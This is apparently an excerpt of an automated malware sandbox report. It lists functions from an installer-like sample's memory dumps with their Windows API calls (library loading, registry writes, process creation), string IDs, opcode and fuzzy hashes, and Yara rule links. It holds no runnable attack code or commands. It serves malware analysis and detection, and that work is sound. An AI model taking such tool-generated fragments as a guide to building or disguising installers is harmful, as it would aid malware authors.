                                                                                • API String ID: 3808545654-0
                                                                                • Opcode ID: 1711f20bd284629642e955f9fcf97280746cc1bdb09c71cfa46585c121ec0b61
                                                                                • Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
                                                                                • Opcode Fuzzy Hash: 1711f20bd284629642e955f9fcf97280746cc1bdb09c71cfa46585c121ec0b61
                                                                                • Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F
                                                                                Function 0040483D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                • wsprintfA.USER32 ref: 004048E3
                                                                                • SetDlgItemTextA.USER32(?,0041FD30), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                                                                • Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
                                                                                • Opcode Fuzzy Hash: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                                                                • Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8
                                                                                Function 001614A8 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: b1bc86166187a991202267250b549f5b80bb6436c1870e24d3f63a6a9a4dcb1a
                                                                                • Instruction ID: de97c9caf507bb055e27ff9b01a2cec7bc944ad4eac1d20604c04a49c5743bb5
                                                                                • Opcode Fuzzy Hash: b1bc86166187a991202267250b549f5b80bb6436c1870e24d3f63a6a9a4dcb1a
                                                                                • Instruction Fuzzy Hash: 7921A138E00248AFDB05DFF9C4416AEB7B2FF86308F1080A9D411AB355DB745A06CF92
                                                                                Function 001617C8 Relevance: 6.3, Strings: 5, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 6aefcbc1ac2d6abc2a4cd387d62609a14488dd59c5df56fe26617dfd4536bdba
                                                                                • Instruction ID: 90ea785bedd40eb9dcbaabe10a12538e9312ca83afd879cd870bd4754aca0925
                                                                                • Opcode Fuzzy Hash: 6aefcbc1ac2d6abc2a4cd387d62609a14488dd59c5df56fe26617dfd4536bdba
                                                                                • Instruction Fuzzy Hash: 7021B034E00248AFCB05DFF9C8016AEBBB6EFC6304F1484A9D410AB355DB749A05CF92
                                                                                Function 001615E8 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 348b9770241a00e89426f80f4623f4700f70b0eb658187f4f2dfe73c22e296b9
                                                                                • Instruction ID: acb9ea8ed283dc979fc15d81576c31536e36b1e5698c709c7de21b86cf3a6cea
                                                                                • Opcode Fuzzy Hash: 348b9770241a00e89426f80f4623f4700f70b0eb658187f4f2dfe73c22e296b9
                                                                                • Instruction Fuzzy Hash: 2E219278E002089FCB05EFF9C44169EBBB1FF86305F1484A9D414AB355DBB45A0ACF42
                                                                                Function 001616D8 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 6b4d5d0b7fc3d5f3f4fded8bca0f16b38b9b47ad8564005765492586dabfed98
                                                                                • Instruction ID: c196ab001082cdf1b0aa03b9b9520a704f3fdcbbd920340ad00bd0fbfb23ad47
                                                                                • Opcode Fuzzy Hash: 6b4d5d0b7fc3d5f3f4fded8bca0f16b38b9b47ad8564005765492586dabfed98
                                                                                • Instruction Fuzzy Hash: 04219C38E00248AFCB05DFF9C40169EBBB1FF86304F1081A9D010AB355DB745A46CF82
                                                                                Function 00161918 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: 9d908a69ea150f9ff37b776b58e836244f6982be86ff468a05249f3eaeb353ff
                                                                                • Instruction ID: 41b28af0b675c2a2c04b19f70165fd682241a7281ead65a97c3d295f2f821272
                                                                                • Opcode Fuzzy Hash: 9d908a69ea150f9ff37b776b58e836244f6982be86ff468a05249f3eaeb353ff
                                                                                • Instruction Fuzzy Hash: 9A215E74E00248AFDB05EFF9C4116AEB7B1EF86308F1084A99414AB395DB745A46CF92
                                                                                Function 00161A10 Relevance: 6.3, Strings: 5, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6$O6
                                                                                • API String ID: 0-1870396516
                                                                                • Opcode ID: cb8128028deca01c45a030f9ce1aedc44b9b0f2ce0093b85ca5bd95db653ab0e
                                                                                • Instruction ID: 98c0baeca3c4ce2410b5cc58b147e270da738cbe37c1c2a6c1df2f9e2f88c61c
                                                                                • Opcode Fuzzy Hash: cb8128028deca01c45a030f9ce1aedc44b9b0f2ce0093b85ca5bd95db653ab0e
                                                                                • Instruction Fuzzy Hash: FC217F34E00248AFDB05EFF9C4416AE77B2EF86308F1084A9D414AB355CB745A41DF82
                                                                                Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: 65bf581ea8d5edc76cd579bd6d3ffe3d6b8ea4bbd2830e889f51061ae8edc0db
                                                                                • Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
                                                                                • Opcode Fuzzy Hash: 65bf581ea8d5edc76cd579bd6d3ffe3d6b8ea4bbd2830e889f51061ae8edc0db
                                                                                • Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E
                                                                                Function 00402364 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CloseCreateValuelstrlen
                                                                                • String ID:
                                                                                • API String ID: 1356686001-0
                                                                                • Opcode ID: bc41edd427ba39f31ac915e283dc2059a997cf39f25f2d86e179569400e4595c
                                                                                • Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
                                                                                • Opcode Fuzzy Hash: bc41edd427ba39f31ac915e283dc2059a997cf39f25f2d86e179569400e4595c
                                                                                • Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28
                                                                                Function 00404FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0040501F
                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00405070
                                                                                  • Part of subcall function 00404094: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004040A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
                                                                                • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA
                                                                                Function 00405B05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405B19
                                                                                • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: nsa
                                                                                • API String ID: 1716503409-2209301699
                                                                                • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
                                                                                • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59
                                                                                Function 004055F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                                                • CloseHandle.KERNEL32(?), ref: 0040562A
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405607
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
                                                                                • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79
                                                                                Function 004068E3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
                                                                                • Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44
                                                                                Function 00406AE4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
                                                                                • Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44
                                                                                Function 004067FA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
                                                                                • Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54
                                                                                Function 004062FF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
                                                                                • Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54
                                                                                Function 0040674D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
                                                                                • Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54
                                                                                Function 0040686B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
                                                                                • Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54
                                                                                Function 004067B7 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
                                                                                • Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44
                                                                                Function 00161478 Relevance: 5.1, Strings: 4, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: F$F$F$O6
                                                                                • API String ID: 0-2380038390
                                                                                • Opcode ID: 0aba5dff44ebaed76b477513d01c6c5e658969524ad201338c7c2273d5740d15
                                                                                • Instruction ID: 372365850fba0ff4b6e96f69a70d72b08ab82c3ea733ef81997ebf1dd3a7a593
                                                                                • Opcode Fuzzy Hash: 0aba5dff44ebaed76b477513d01c6c5e658969524ad201338c7c2273d5740d15
                                                                                • Instruction Fuzzy Hash: 2F216A34A002589FCB06DFB4D4516AE77B1FF86308F1184A9D4029B345DB789E0ACF92
                                                                                Function 00405A3B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
                                                                                • CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
                                                                                • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9